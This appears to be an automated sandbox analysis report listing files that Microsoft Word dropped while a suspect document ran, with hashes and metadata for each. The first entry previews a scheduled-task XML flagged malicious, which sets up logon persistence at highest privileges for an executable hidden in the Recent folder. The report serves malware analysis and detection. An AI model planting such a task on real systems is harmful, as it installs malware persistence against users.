                                                                                                                                                SHA-512:45C99FB3ABABEBF7FF959B918E74BDD3E0C8DEF98E7A510734B236A9A57ADF6BCAF8E4D837CE635E27D208AA5D9617B86C1095FB7910340BE47B099448E1969A
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe</Command>. <
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):2.9001324272050257
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:iXKWJRMlW8O9Z3Run/n/lfllmXfjaiuP:i/fMlW8O2IX7WP
                                                                                                                                                MD5:9A17B69D3BABD1B79E237CEB764F7379
                                                                                                                                                SHA1:C1FD2477B889D95AFEDA1F4DB748901A99681C46
                                                                                                                                                SHA-256:E9668C9AA431D9294DD7F7F1EE48D1766AA3AA09707E06C94D33FDD6F9C6C527
                                                                                                                                                SHA-512:78207B63F941DBDB4B6DF0ED322147AE2EE85CD68A186680B20CE3874706C968857578C802273FFB2092E463004838505668EF44E431973D87F86F3CE463E75B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.user..............................................f.r.o.n.t.d.e.s.k.......$.........aKj...............................................$."..}.j.........=Kj
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):30
                                                                                                                                                Entropy (8bit):1.2389205950315936
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:zBZ:
                                                                                                                                                MD5:8CC6D97D5F016820D661B4B595D14F18
                                                                                                                                                SHA1:EA6660AC83854E2E7F1C699E92C916EC6753C86F
                                                                                                                                                SHA-256:93AD009496713AE3BE3B2E2F3FBA8BE8D5B7922AC07BB3A51396C894CC1C681E
                                                                                                                                                SHA-512:D99879CB7096BD89A871CD738FD1DE95A150DBEFC50A98FED70964E45C249C74FC79D361CD2B6747071EFAF0667795F836844ECF1D1676938FD3F89EA345FCE5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.....$........................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):562113
                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649585
                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):558035
                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):570901
                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):523048
                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3078052
                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):777647
                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):924687
                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):966946
                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1204049
                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):486596
                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):976001
                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1463634
                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2218943
                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1750795
                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2924237
                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2357051
                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3611324
                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1091485
                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608122
                                                                                                                                                Entropy (8bit):7.729143855239127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5783
                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4026
                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4243
                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16806
                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11380
                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6024
                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                Malicious:false
